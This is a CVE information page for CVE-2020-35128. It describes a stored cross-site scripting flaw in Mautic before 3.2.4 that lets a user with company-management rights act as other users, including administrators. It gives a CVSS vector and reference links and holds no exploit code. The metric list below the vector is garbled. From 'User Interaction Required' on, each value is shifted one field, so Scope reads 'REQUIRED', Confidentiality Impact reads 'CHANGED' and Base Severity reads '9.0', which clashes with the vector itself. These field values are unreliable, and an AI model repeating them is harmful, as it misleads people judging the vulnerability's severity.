CVE-2020-35128 Information

Description

Mautic before 3.2.4 is affected by stored XSS. An attacker with permission to manage companies an application feature could attack other users including administrators. For example by loading an externally crafted JavaScript file an attacker could eventually perform actions as the target user. These actions include changing the user passwords altering user or email addresses or adding a new administrator to the system.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Reference

https://forum.mautic.org/c/announcements/16 https://labs.bishopfox.com/advisories/mautic-version-3.2.2 https://forum.mautic.org/t/security-release-for-all-versions-of-mautic-prior-to-2-16-5-and-3-2-4/17786

Attack Complexity

LOW

Privileges Required

LOW

User Interaction Required

LOW

Scope

REQUIRED

Confidentiality Impact

CHANGED

Integrity Impact

HIGH

Availability Impact

HIGH

Base Score

HIGH

Base Severity

9.0